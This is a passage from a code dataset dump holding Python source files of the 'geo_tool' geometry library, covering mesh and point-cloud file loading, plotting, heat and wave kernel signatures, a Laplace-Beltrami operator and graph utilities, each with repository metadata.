np.empty((n, 3), dtype=np.float32)\n for i in xrange(n):\n tokens = all_lines[i].rstrip().split(' ')\n pixels[i, :] = [int(tokens[0]), int(tokens[1])]\n triangles[i, :] = [int(tokens[2]), int(tokens[3]), int(tokens[4])]\n hit_coords[i, :] = [float(tokens[5]), float(tokens[6]), float(tokens[7])]\n return pixels, triangles, hit_coords\n\n\ndef load_views_of_shape(view_folder, file_format, shape_views=None, reshape_to=None):\n view_list = []\n cam_pos = []\n view_mask = []\n\n searh_pattern = os.path.join(view_folder, '*.' 
+ file_format)\n for view in glob(searh_pattern):\n image = cv2.imread(view, 0) # Convert to Gray-Scale\n if reshape_to is not None:\n image = cv2.resize(image, reshape_to)\n\n reshape_to = image.shape\n view_mask.append(image != 0) # Compute mask before whiten is applied.\n # if whiten:\n # image = per_image_whitening(image)\n view_list.append(image)\n cam_pos.append(name_to_cam_position(view))\n\n if shape_views and len(view_list) != shape_views:\n raise IOError('Number of view files (%d) doesn\\'t match the expected ones (%d)' % (len(view_list), shape_views))\n elif len(view_list) == 0:\n raise IOError('There are no files of given format in this folder.')\n else:\n shape_views = len(view_list)\n\n views_tensor = np.reshape(view_list, (shape_views, reshape_to[0], reshape_to[1]))\n return views_tensor, cam_pos, np.array(view_mask)\n\n\ndef format_image_tensor_for_tf(im_tensor, whiten=True):\n new_tensor = np.zeros(im_tensor.shape, dtype=np.float32)\n if whiten:\n for ind, im in enumerate(im_tensor):\n new_tensor[ind, :, :] = per_image_whitening(im)\n return np.expand_dims(new_tensor, 3) # Add singleton trailing dimension.\n\n\ndef load_wavefront_obj(file_name, vdtype=np.float32, tdtype=np.int32):\n '''Loads the vertices, the faces and the face normals (if exist) of a wavefront .obj file.\n It ignores any textures, materials, free forms or vertex normals.\n '''\n vertices = list()\n faces = list()\n normals = list()\n\n with open(file_name, 'r') as f_in:\n for line in f_in:\n if line.startswith('#'):\n continue\n values = line.split()\n\n if not values or values[0] in ('usemtl', 'usemat', 'vt', 'mtllib', 'vp'):\n continue\n\n if values[0] == 'v':\n v = list(map(vdtype, values[1:4]))\n vertices.append(v)\n elif values[0] == 'vn':\n v = list(map(vdtype, values[1:4]))\n normals.append(v)\n elif values[0] == 'f':\n face = []\n for v in values[1:]:\n w = v.split('/')\n face.append(tdtype(w[0])) # Starts at 1. Can be negative.\n faces.append(face)\n\n vertices = np.array(vertices)\n faces = np.array(faces)\n normals = np.array(normals)\n faces = faces - 1\n if np.any(faces < 0):\n print('Negative face indexing in .obj is used.')\n n_v = vertices.shape[0]\n faces[faces < 0] = n_v - faces[faces < 0]\n\n return vertices, faces, normals\n\n\ndef write_wavefront_obj(filename, vertices, faces, vertex_normals=None):\n ''' Write a wavefront obj to a file. It will only consider: vertices, faces and (optionally) vertex normals.\n '''\n faces = faces + 1 # Starts at 1\n with open(filename, 'w') as f_out:\n # write vertices\n for v in vertices:\n f_out.write('v %f %f %f\\n' % (v[0], v[1], v[2]))\n\n # write faces\n for f in faces:\n f_out.write('f %d %d %d\\n' % (f[0], f[1], f[2]))\n\n # Write normals.\n if vertex_normals is not None:\n for vn in vertex_normals:\n f_out.write('vn %f %f %f\\n' % (vn[0], vn[1], vn[2]))\n\n\ndef load_crude_point_cloud(file_name, delimiter=' ', comments='#', dtype=np.float32, permute=None):\n '''Input: file_name (string) of a file containing 3D points. Each line of the file\n is expected to contain exactly one point. 
The x,y,z coordinates of the point are separated via the provided\n delimiter character(s).\n '''\n\n data = np.loadtxt(file_name, dtype=dtype, comments=comments, delimiter=delimiter)\n if permute is not None:\n if len(permute) != 3 or not np.all(np.equal(sorted(permute), np.array([0, 1, 2]))):\n raise ValueError('Permutation.')\n data = data[:, permute]\n return data\n\n\ndef load_crude_point_cloud_with_normals(file_name, delimiter=' ', comments='#', dtype=np.float32):\n '''Input: file_name (string) of a file containing 3D points. Each line of the file\n is expected to contain exactly one point with a normal vector. The x,y,z coordinates of the point are separated via the provided\n delimiter character(s).\n '''\n data = np.loadtxt(file_name, dtype=dtype, comments=comments, delimiter=delimiter)\n return data\n\n\ndef load_annotation_of_points(file_name, data_format='shape_net'):\n '''\n Loads the annotation file that describes for every point of a point cloud which part it belongs too.\n '''\n\n if data_format == 'shape_net':\n return np.loadtxt(file_name, dtype=np.int16)\n else:\n ValueError('NIY.')\n\n\ndef load_ply(file_name, with_faces=False, with_color=False):\n ply_data = PlyData.read(file_name)\n points = ply_data['vertex']\n points = np.vstack([points['x'], points['y'], points['z']]).T\n ret_val = [points]\n\n if with_faces:\n faces = np.vstack(ply_data['face']['vertex_indices'])\n ret_val.append(faces)\n\n if with_color:\n r = np.vstack(ply_data['vertex']['red'])\n g = np.vstack(ply_data['vertex']['green'])\n b = np.vstack(ply_data['vertex']['blue'])\n color = np.hstack((r, g, b))\n ret_val.append(color)\n\n if len(ret_val) == 1: # Unwrap the list\n ret_val = ret_val[0]\n\n return ret_val\n\n\ndef save_as_ply(points, file_out, normals=None, color=None, binary=True):\n if normals is None and color is None:\n vp = np.array([(p[0], p[1], p[2]) for p in points], dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4')])\n elif color is None:\n # normals exist\n values = np.hstack((points, normals))\n vp = np.array([(v[0], v[1], v[2], v[3], v[4], v[5]) for v in values], dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('nx', 'f4'), ('ny', 'f4'), ('nz', 'f4')])\n elif normals is None:\n # color exist\n values = np.hstack((points, color))\n vp = np.array([(v[0], v[1], v[2], v[3], v[4], v[5]) for v in values], dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red', 'uint8'), ('green', 'uint8'), ('blue', 'uint8')]) \n else:\n # both color and normals exist\n raise NotImplementedError()\n\n el = PlyElement.describe(vp, 'vertex')\n text = not binary\n PlyData([el], text=text).write(file_out + '.ply')\n\n\ndef load_off(file_name, vdtype=np.float32, tdtype=np.int32):\n# break_floats = lambda in_file : [vdtype(s) for s in in_file.readline().strip().split(' ')]\n break_floats = lambda in_file : [vdtype(s) for s in in_file.readline().strip().split()]\n\n with open(file_name, 'r') as f_in:\n header = f_in.readline().strip()\n if header not in ['OFF', 'COFF']:\n raise ValueError('Not a valid OFF header.')\n\n# n_verts, n_faces, _ = tuple([tdtype(s) for s in f_in.readline().strip().split(' ')]) # Disregard 3rd argument: n_edges.\n n_verts, n_faces, _ = tuple([tdtype(s) for s in f_in.readline().strip().split()]) # Disregard 3rd argument: n_edges.\n\n verts = np.empty((n_verts, 3), dtype=vdtype)\n v_color = None\n first_line = break_floats(f_in)\n verts[0, :] = first_line[:3]\n if len(first_line) > 3:\n v_color = np.empty((n_verts, 4), dtype=vdtype)\n v_color[0, :] = first_line[3:]\n for i in xrange(1, n_verts):\n 
line = break_floats(f_in)\n verts[i, :] = line[:3]\n v_color[i, :] = line[3:]\n else:\n for i in xrange(1, n_verts):\n verts[i, :] = break_floats(f_in)\n\n first_line = [s for s in f_in.readline().strip().split()]\n# first_line = [s for s in f_in.readline().strip().split(' ')]\n poly_type = int(first_line[0]) # 3 for triangular mesh, 4 for quads etc.\n faces = np.empty((n_faces, poly_type), dtype=tdtype)\n faces[0:] = [tdtype(f) for f in first_line[1:poly_type + 1]]\n f_color = None\n if len(first_line) > poly_type + 1: # Color coded faces.\n f_color = np.empty((n_faces, 4), dtype=vdtype)\n f_color[0, :] = first_line[poly_type + 1:]\n for i in xrange(1, n_faces):\n line = [s for s in f_in.readline().strip().split()]\n# line = [s for s in f_in.readline().strip().split(' ')]\n ptype = int(line[0])\n if ptype != poly_type:\n raise ValueError('Mesh contains faces of different dimensions. Loader in not yet implemented for this case.')\n faces[i, :] = [tdtype(f) for f in line[1:ptype + 1]]\n f_color[i, :] = [vdtype(f) for f in line[ptype + 1:]]\n else:\n for i in xrange(1, n_faces):\n line = [tdtype(s) for s in f_in.readline().strip().split()]\n# line = [tdtype(s) for s in f_in.readline().strip().split(' ')]\n if line[0] != poly_type:\n raise ValueError('Mesh contains faces of different dimensions. Loader in not yet implemented for this case.')\n faces[i, :] = line[1:]\n\n if v_color is not None and f_color is not None:\n return verts, faces, v_color, f_color\n if v_color is not None:\n return verts, faces, v_color\n if f_color is not None:\n return verts, faces, f_color\n return verts, faces\n\n\ndef load_mesh_from_file(file_name):\n dot_loc = file_name.rfind('.')\n file_type = file_name[dot_loc + 1:]\n if file_type == 'off':\n return load_off(file_name)\n elif file_type == 'obj':\n return load_wavefront_obj(file_name)\n else:\n ValueError('NIY.')\n\n\ndef write_off(out_file, vertices, faces, vertex_color=None, face_color=None):\n nv = len(vertices)\n nf, tf = faces.shape\n if tf != 3:\n raise ValueError('Not Implemented Yet.')\n\n vc = not(vertex_color is None)\n fc = not(face_color is None)\n\n if vc and fc:\n raise ValueError('Color can be specified for the faces or the vertices - not both.')\n\n with open(out_file, 'w') as fout:\n if vc or fc:\n fout.write('COFF\\n')\n else:\n fout.write('OFF\\n')\n\n fout.write('%d %d 0\\n' % (nv, nf)) # The third number is supposed to be the num of edges - but is set to 0 as per common practice.\n\n if vc:\n c = vertex_color\n for i, v in enumerate(vertices):\n fout.write('%f %f %f %f %f %f %f\\n' % (v[0], v[1], v[2], c[i, 0], c[i, 1], c[i, 2], c[i, 3]))\n for f in faces:\n fout.write('%d %d %d %d\\n' % (tf, f[0], f[1], f[2]))\n elif fc:\n for v in vertices:\n fout.write('%f %f %f\\n' % (v[0], v[1], v[2]))\n c = face_color\n for i, f in enumerate(faces):\n fout.write('%d %d %d %d %f %f %f %f\\n' % (tf, f[0], f[1], f[2], c[i, 0], c[i, 1], c[i, 2], c[i, 3]))\n else:\n for v in vertices:\n fout.write('%f %f %f\\n' % (v[0], v[1], v[2]))\n for f in faces:\n fout.write('%d %d %d %d\\n' % (tf, f[0], f[1], f[2]))\n\n\ndef write_pixel_list_to_txt(x_coord, y_coord, outfile):\n pixels = np.vstack([x_coord, y_coord])\n pixels = np.transpose(pixels) # Write each pixel pair on each own line.\n np.savetxt(outfile, pixels, fmt='%d')\n\n\ndef read_pixel_list_from_txt(in_file):\n pixels = np.loadtxt(in_file, dtype=np.int32)\n x_coord = pixels[:, 0]\n y_coord = pixels[:, 1]\n return x_coord, y_coord\n"
},
{
"alpha_fraction": 0.5971277356147766,
"alphanum_fraction": 0.6235827803611755,
"avg_line_length": 26,
"blob_id": "96be96cdafc6c3f973ee2262bba291130fe27f18",
"content_id": "7332272709174901f05cf97705cc84e5e2479126",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1323,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 49,
"path": "/point_clouds/plotting.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on July 11, 2017\n\n@author: optas\n'''\nimport numpy\nimport matplotlib.pyplot as plt\n\ntry:\n from mayavi import mlab as mayalab\nexcept:\n print('mayavi not installed.')\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom . point_cloud import Point_Cloud\n\nl2_norm = numpy.linalg.norm\n\n\ndef plot_pclouds_on_grid(pclouds, grid_size, fig_size=(50, 50), plot_kwargs={}):\n '''Input\n pclouds: Iterable holding point-cloud data. pclouds[i] must be a 2D array with any number of rows and 3 columns.\n '''\n fig = plt.figure(figsize=fig_size)\n c = 1\n for cloud in pclouds:\n plt.subplot(grid_size[0], grid_size[1], c, projection='3d')\n plt.axis('off')\n ax = fig.axes[c - 1]\n Point_Cloud(points=cloud).plot(axis=ax, show=False, **plot_kwargs)\n c += 1\n return fig\n\n\ndef plot_vector_field_mayavi(points, vx, vy, vz):\n mayalab.quiver3d(points[:, 0], points[:, 1], points[:, 2], vx, vy, vz)\n mayalab.show()\n\n\ndef plot_vector_field_matplotlib(pcloud, vx, vy, vz, normalize=True, length=0.01):\n fig = plt.figure()\n ax = Axes3D(fig)\n pts = pcloud.points\n if normalize:\n row_norms = l2_norm(pts, axis=1)\n pts = pts.copy()\n pts = (pts.T / row_norms).T\n return ax.quiver3D(pts[:, 0], pts[:, 1], pts[:, 2], vx, vy, vz, length=length)\n"
},
{
"alpha_fraction": 0.6070736646652222,
"alphanum_fraction": 0.6184592843055725,
"avg_line_length": 36.18918991088867,
"blob_id": "aab27bb6ca68a6d4ea446c7d1e0d853ae57275d7",
"content_id": "e2c43e7516e7b1abe341e03edaab47d45ed2df2d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8256,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 222,
"path": "/signatures/node_signatures.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panos Achlioptas.\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n@updated: Winnie Lin ([email protected]), March 2018.\n'''\n\nimport numpy as np\nimport math\nimport scipy.sparse as sparse\nfrom scipy.sparse.linalg import eigs\n\nfrom general_tools.rla.one_d_transforms import smooth_normal_outliers, find_non_homogeneous_vectors\nfrom general_tools.arrays.basics import scale\nfrom .. utils import linalg_utils as utils\n\n\ndef fiedler_of_component_spectra(in_mesh, in_lb, thres):\n spectra, multi_cc = in_lb.multi_component_spectra(2, thres)\n n_cc = len(multi_cc)\n aggregate_color = np.zeros((in_mesh.num_vertices, 1))\n for i in xrange(n_cc):\n nodes = multi_cc[i]\n if spectra[i]:\n magic_color = scale(spectra[i][1][:, -1]**2)\n aggregate_color[nodes] = magic_color.reshape(len(nodes), 1)\n return aggregate_color[:, 0]\n\n\ndef hks_of_component_spectra(in_mesh, in_lb, area_type, percent_of_eigs, time_horizon, min_nodes=None, min_eigs=None, max_eigs=None):\n spectra, multi_cc = in_lb.multi_component_spectra(in_mesh, area_type, percent_of_eigs,\n min_nodes=min_nodes, min_eigs=min_eigs, max_eigs=max_eigs)\n n_cc = len(multi_cc)\n hks_signature = np.zeros((in_mesh.num_vertices, time_horizon))\n aggregate_color = np.zeros((in_mesh.num_vertices, ))\n\n for i in xrange(n_cc):\n nodes = multi_cc[i]\n if spectra[i]:\n evals = spectra[i][0]\n evecs = spectra[i][1].T\n pos_index = evals > 0\n if np.sum(pos_index) == 0:\n continue\n evals = evals[pos_index]\n evecs = evecs[pos_index, :]\n evecs = np.around(evecs, 2)\n smooth_normal_outliers(evecs, 3)\n index = find_non_homogeneous_vectors(evecs, 0.95)\n if len(index) >= 2:\n evecs = evecs[index, :]\n evals = evals[index] + 1 # Add 1 to make the division on time_samples strictly decreasing\n ts = hks_time_sample_generator(evals[0], evals[-1], time_horizon)\n sig = heat_kernel_signature(evals, evecs, ts)\n sig = sig / utils.l2_norm(sig, axis=0)\n hks_signature[nodes, :] = sig\n magic_color = scale(np.sum(sig, 1))\n aggregate_color[nodes] = magic_color.reshape(len(nodes), 1)\n\n return aggregate_color, hks_signature\n\n\ndef gaussian_curvature(in_mesh):\n acc_map = in_mesh.triangles.ravel()\n angles = in_mesh.angles_of_triangles().ravel()\n acc_array = np.bincount(acc_map, weights=angles)\n gauss_curv = (2 * np.pi - acc_array)\n gauss_curv = gauss_curv.reshape(len(gauss_curv), 1)\n gauss_curv /= in_mesh.area_of_vertices()\n return gauss_curv\n\n\ndef mean_curvature(in_mesh, laplace_beltrami):\n N = in_mesh.normals_of_vertices()\n mean_curv = 0.5 * np.sum(N * (laplace_beltrami.W * in_mesh.vertices), 1)\n return mean_curv\n\n\ndef heat_kernel_embedding(lb, n_eigs, n_time):\n evals, evecs = lb.spectra(n_eigs)\n pos_index = evals > 0\n evals = evals[pos_index]\n evecs = evecs[:, pos_index]\n time_points = hks_time_sample_generator(evals[0], evals[-1], n_time)\n return heat_kernel_signature(evals, evecs.T, time_points)\n\n\ndef heat_kernel_signature(evals, evecs, time_horizon, verbose=False):\n ''' given eigenbasis of mesh's Laplace Beltrami operator, returns the heat kernel signature at each time point within the time_horizon.\n\n input dimensions:\n evecs = (n_vecs, n_vertices)\n evals = (n_vecs,)\n time_horizon = [n_timepoints]\n\n output dimensions = (n_vertices,n_timepoints)\n '''\n\n if len(evals) != evecs.shape[0]:\n raise ValueError('Eigenvectors must have dimension = #eigen-vectors x nodes.')\n if 
verbose:\n print \"Computing Heat Kernel Signature with %d eigen-pairs.\" % (len(evals),)\n\n n = evecs.shape[1] # Number of nodes.\n signatures = np.empty((n, len(time_horizon)))\n squared_evecs = np.square(evecs)\n for t, tp in enumerate(time_horizon):\n interm = np.exp(-tp * evals)\n signatures[:, t] = np.matmul(interm, squared_evecs)\n\n return signatures\n\n\ndef hks_time_sample_generator(min_eval, max_eval, time_points):\n '''\n returns sampled time intervals to be passed into heat_kernel_signature().\n\n output dimensions = [time_points]\n '''\n\n if max_eval <= min_eval or min_eval <= 0:\n raise ValueError('Two non-negative and sorted eigen-values are expected as input.')\n\n logtmin = math.log(math.log(10) / max_eval)\n logtmax = math.log(math.log(10) / min_eval)\n assert(logtmax > logtmin) \n stepsize = (logtmax - logtmin) / (time_points - 1) #minus 1 is to ensure we reach max\n logts = [logtmin + i * stepsize for i in range(time_points)]\n return [math.exp(i) for i in logts]\n\n\ndef wave_kernel_signature(evals, evecs, energies, sigma=1):\n ''' given eigenbasis of mesh's Laplace Beltrami operator, returns the wave kernel signature at each time point within the time_horizon.\n\n input dimensions:\n evecs = (n_vecs, n_vertices)\n evals = (n_vecs,)\n energies = [n_timepoints]\n output dimensions = (n_vertices,n_timepoints)\n '''\n\n if len(evals) != evecs.shape[0]:\n raise ValueError('Eigenvectors must have dimension = #eigen-vectors x nodes.')\n\n n = evecs.shape[1] # Number of nodes.\n signatures = np.empty((n, len(energies)))\n squared_evecs = np.square(evecs)\n\n log_evals = np.log(evals)\n var = 2 * (sigma**2)\n for t, en in enumerate(energies):\n interm = np.exp(-(en - log_evals) ** 2 / var)\n norm_factor = 1 / np.sum(interm)\n signatures[:, t] = np.matmul(interm, squared_evecs) * norm_factor\n\n assert(np.alltrue(signatures >= 0))\n return signatures\n\n\ndef wks_energy_generator(min_eval, max_eval, time_points, padding=7, shrink=1):\n '''\n returns sampled energy intervals to be passed into wave_kernel_signature().\n\n output dimensions = [time_points]\n\n parameters from original paper:\n emin= e_1+2*sigma\n emax= e_n-2*sigma\n delta= (emax-emin)/num_timepoints\n sigma= 7*delta\n\n '''\n\n if min_eval == 0:\n raise ValueError('minimum eigenvalue must not be zero.')\n\n logmin = math.log(min_eval)\n logmax = math.log(max_eval)\n logmax = shrink * logmax + (1 - shrink) * logmin\n #if shrink != 1:\n # emax = math.log(max_eval) / float(shrink)\n #else:\n # emax = math.log(max_eval)\n #if emax <= emin:\n # print \"Warning: too much shrink. 
- Will be set manually.\"\n # emax = emin + 0.05 * emin\n\n delta = (logmax - logmin) / (time_points + 2 * padding - 1) #minus 1 is to ensure we reach emax (emax = logmax - sigma)\n sigma = padding * delta\n emin = logmin + sigma\n res = [emin + i * delta for i in range(time_points)]\n return res, sigma\n\n\ndef merge_component_spectra(in_mesh, in_lb, percent_of_eigs, merger=np.sum):\n spectra, multi_cc = in_lb.multi_component_spectra(in_mesh, percent=percent_of_eigs)\n n_cc = len(multi_cc)\n signature = np.zeros((in_mesh.num_vertices, 1))\n for i in xrange(n_cc):\n nodes = multi_cc[i]\n if spectra[i]:\n magic_color = merger(spectra[i][1]**2, axis=1)\n signature[nodes] = magic_color.reshape(len(nodes), 1)\n return signature[:, 0]\n\n\ndef extrinsic_laplacian(in_mesh, num_eigs):\n V = in_mesh.vertices\n E = in_mesh.undirected_edges()\n vals = V[E[:, 1]]\n Wx = sparse.csr_matrix((vals[:, 0], (E[:, 0], E[:, 1])), shape=(in_mesh.num_vertices, in_mesh.num_vertices))\n Wy = sparse.csr_matrix((vals[:, 1], (E[:, 0], E[:, 1])), shape=(in_mesh.num_vertices, in_mesh.num_vertices))\n Wz = sparse.csr_matrix((vals[:, 2], (E[:, 0], E[:, 1])), shape=(in_mesh.num_vertices, in_mesh.num_vertices))\n _, evecsx = eigs(Wx, num_eigs, which='LM')\n _, evecsy = eigs(Wy, num_eigs, which='LM')\n _, evecsz = eigs(Wz, num_eigs, which='LM')\n evecsx = np.sum(evecsx.real, axis=1)\n evecsy = np.sum(evecsy.real, axis=1)\n evecsz = np.sum(evecsz.real, axis=1)\n return np.vstack((evecsx, evecsy, evecsz))\n"
},
{
"alpha_fraction": 0.8108108043670654,
"alphanum_fraction": 0.8108108043670654,
"avg_line_length": 37,
"blob_id": "fbe4f711b22d5f6fd2b1a3a482a26b9ddc180d53",
"content_id": "14527d3211072a302dd3cde461dc0f77e404dde0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 37,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 1,
"path": "/point_clouds/__init__.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "from . point_cloud import Point_Cloud"
},
{
"alpha_fraction": 0.8190045356750488,
"alphanum_fraction": 0.8190045356750488,
"avg_line_length": 43.20000076293945,
"blob_id": "18f5811ae9796b950de6e6101db8148665da0212",
"content_id": "73217f1fca52f82d2a648f88ff145f2d8a1362e6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 221,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 5,
"path": "/__init__.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "from . fundamentals.graph import Graph\nfrom . fundamentals.cuboid import Cuboid\nfrom . solids.mesh import Mesh\nfrom . laplacians.laplace_beltrami import Laplace_Beltrami\nfrom . point_clouds.point_cloud import Point_Cloud\n"
},
{
"alpha_fraction": 0.5739851593971252,
"alphanum_fraction": 0.5853339433670044,
"avg_line_length": 38.162391662597656,
"blob_id": "c0d98b2c1d4e8ad03fb292ef9ee03cb6cce4eb65",
"content_id": "892de8eab6dbc28c3ef6eea389be5d453ee3040e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4582,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 117,
"path": "/laplacians/laplace_beltrami.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on July 21, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport warnings\nimport numpy as np\n#from scipy import sparse\nimport scipy.sparse as sparse\n\nfrom scipy.sparse.linalg import eigs\nfrom math import ceil\n\nfrom .. utils import linalg_utils as utils\nfrom .. utils.linalg_utils import l2_norm\nfrom .. solids import mesh_cleaning as cleaning\nfrom .. fundamentals.graph import Graph\n\n\nclass Laplace_Beltrami(object):\n '''A class representing a discretization of the Laplace Beltrami operator, associated with a given\n Mesh object.\n '''\n def __init__(self, in_mesh):\n '''\n Constructor\n Notes: when a duplicate triangle exists for instance it will contribute twice in\n the computation of the area of each of its vertices.\n '''\n if cleaning.has_duplicate_triangles(in_mesh): # Add test for zero areas. and degenerate triangles cotangent is infinite there).\n raise ValueError('The given mesh contains duplicate triangles. Please clean them before making an LB.')\n self.M = in_mesh\n self.W = Laplace_Beltrami.cotangent_laplacian(self.M)\n\n def spectra(self, k, area_type='barycentric'):\n A = self.M.area_of_vertices(area_type)\n A = sparse.spdiags(A[:, 0], 0, A.size, A.size)\n evals, evecs = eigs(self.W, k, A, sigma=-10e-1, which='LM')\n\n if np.any(l2_norm(evecs.imag, axis=0) / l2_norm(evecs.real, axis=0) > 1.0 / 100):\n warnings.warn('Produced eigen-vectors are complex and contain significant mass on the imaginary part.')\n\n evecs = evecs.real # eigs returns complex values by default.\n evals = evals.real\n\n nans = np.isnan(evecs)\n if nans.any():\n warnings.warn('NaN values were produced in some evecs. These evecs will be dropped.')\n ok_evecs = np.sum(nans, axis=0) == 0\n\n if ok_evecs.any():\n evecs = evecs[:, ok_evecs]\n evals = evals[ok_evecs]\n else:\n return []\n\n gram_matrix = (A.dot(evecs)).T.dot(evecs)\n gram_matrix = gram_matrix - np.eye(evecs.shape[1])\n if np.max(gram_matrix) > 10e-5:\n warnings.warn('Eigenvectors are not orthogonal within 10e-5 relative error.')\n\n evals, evecs = utils.sort_spectra(evals, evecs)\n\n return evals, evecs\n\n def multi_component_spectra(self, k, area_type, percent=None, min_nodes=None, min_eigs=None, max_eigs=None, thres=1):\n _, node_labels = self.M.connected_components()\n cc_at_thres = Graph.largest_connected_components_at_thres(node_labels, thres)\n n_cc = len(cc_at_thres)\n E = list()\n for i in xrange(n_cc):\n keep = cc_at_thres[i]\n temp_mesh = self.M.copy()\n cleaning.filter_vertices(temp_mesh, keep)\n cleaning.clean_mesh(temp_mesh)\n num_nodes = temp_mesh.num_vertices\n if min_nodes is not None and num_nodes < min_nodes:\n E.append([])\n continue\n if percent is not None:\n k = int(ceil(percent * num_nodes))\n\n if min_eigs is not None:\n k = max(k, min_eigs)\n\n if max_eigs is not None:\n k = min(k, max_eigs)\n try:\n feasible_k = min(k, num_nodes - 2)\n E.append((Laplace_Beltrami(temp_mesh).spectra(feasible_k, area_type)))\n except:\n print('Component {0} failed.'.format((i)))\n E.append([])\n return E, cc_at_thres\n\n @staticmethod\n def cotangent_laplacian(in_mesh):\n '''Computes the cotangent laplacian weight matrix. 
Also known as the stiffness matrix.\n Output: a PSD matrix.\n '''\n T = in_mesh.triangles\n angles = in_mesh.angles_of_triangles()\n I = np.hstack([T[:, 0], T[:, 1], T[:, 2]])\n J = np.hstack([T[:, 1], T[:, 2], T[:, 0]])\n S = 0.5 / np.tan(np.hstack([angles[:, 2], angles[:, 0], angles[:, 1]])) # TODO-P Possible division by zero\n In = np.hstack([I, J, I, J])\n Jn = np.hstack([J, I, I, J])\n Sn = np.hstack([-S, -S, S, S])\n W = sparse.csc_matrix((Sn, (In, Jn)), shape=(in_mesh.num_vertices, in_mesh.num_vertices))\n if utils.is_symmetric(W, tolerance=10e-5) == False:\n warnings.warn('Cotangent matrix is not symmetric within epsilon: %f' % (10e-5,))\n W /= 0.5\n W = W + W.T\n return W\n"
},
{
"alpha_fraction": 0.5782527923583984,
"alphanum_fraction": 0.5869888663291931,
"avg_line_length": 36.36111068725586,
"blob_id": "64e14f75c80edcef0b96fe3fa3f02f0ca1bdab7d",
"content_id": "092748f6b670ddcb67e6cb8c24144dc72df8b5de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5380,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 144,
"path": "/fundamentals/graph.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on August 3, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nfrom scipy import sparse as sparse\nfrom numpy.matlib import repmat\n\nfrom .. utils import linalg_utils as lu\n\n\nclass Graph(object):\n '''A class offering some basic graph-related functions. It uses mostly scipy modules.\n '''\n\n def __init__(self, adjacency, is_directed):\n '''\n Constructor\n '''\n self.adjacency = adjacency\n self.is_directed = is_directed\n\n def edges(self):\n '''\n ''' # TODO return values too.\n if self.is_directed:\n E = self.adjacency.nonzero()\n else:\n E = sparse.triu(self.adjacency).nonzero() # TODO: Assumes - sparse storage.\n return E\n\n @staticmethod\n def connected_components(A):\n return sparse.csgraph.connected_components(A, directed=False)\n\n @staticmethod\n def largest_connected_components_at_thres(node_labels, thres):\n '''\n Marks the nodes that exist in the largest connected components so that [thres] percent of total nodes are covered.\n '''\n if thres <= 0 or thres > 1:\n raise ValueError('threshold variable must be in (0,1].')\n\n unique_labels, counts = np.unique(node_labels, return_counts=True)\n decreasing_index = [np.argsort(counts)[::-1]]\n counts = counts[decreasing_index]\n unique_labels = unique_labels[decreasing_index]\n cumulative = np.cumsum(counts, dtype=np.float32)\n cumulative /= cumulative[-1]\n n_cc = max(1, np.sum(cumulative <= thres))\n cc_marked_list = [np.where(node_labels == unique_labels[i])[0] for i in range(n_cc)]\n assert(any([len(x)<=0 for x in cc_marked_list]) == False)\n return cc_marked_list\n\n @staticmethod\n def knn_to_adjacency(neighbors, weights, direction='out'):\n '''Converts neighborhood-like data into the adjacency matrix of an underlying graph.\n\n Args:\n neighbors - (N x K) neighbors(i,j) is j-th neighbor of the i-th node.\n\n weights - (N x K) weights(i,j) is the weight of the (directed) edge between i to j.\n\n direction - (optional, String) 'in' or 'out'. If 'in' then weights(i,j) correspond to an edge\n that points towards i. Otherwise, towards j. 
Default = 'out'.\n\n Returns:\n A - (N x N) sparse adjacency matrix, (i,j) entry corresponds to an edge from i to j.\n '''\n\n if np.any(weights < 0):\n raise ValueError('Non negative weights for an adjacency matrix are not supported.')\n\n n, k = neighbors.shape\n temp = repmat(np.arange(n), k, 1).T\n i = temp.ravel()\n j = neighbors.ravel()\n v = weights.ravel()\n\n A = sparse.csr_matrix((v, (i, j)), shape=(n, n))\n if direction == 'in':\n A = A.T\n return A\n\n @staticmethod\n def adjacency_to_laplacian(A, laplacian_type='comb'):\n '''Computes the laplacian matrix for a graph described by its adjacency matrix.\n\n Args: A - (n x n) Square symmetric adjacency matrix of a graph with n nodes.\n laplacian_type - (String, optional) Describes the desired type of laplacian.\n\n Valid values:.\n 'comb' - Combinatorial (unormalized) laplacian (Default value).\n 'norm' - Symmetric Normalized Laplacian.\n 'sign' - Signless Laplacian.\n\n Output: L - (n x n) sparse matrix of the corresponding laplacian.\n\n Notes:\n DOI: \"A Tutorial on Spectral Clustering, U von Luxburg\".\n\n (c) Panos Achlioptas 2015 - http://www.stanford.edu/~optas/FmapLib\n 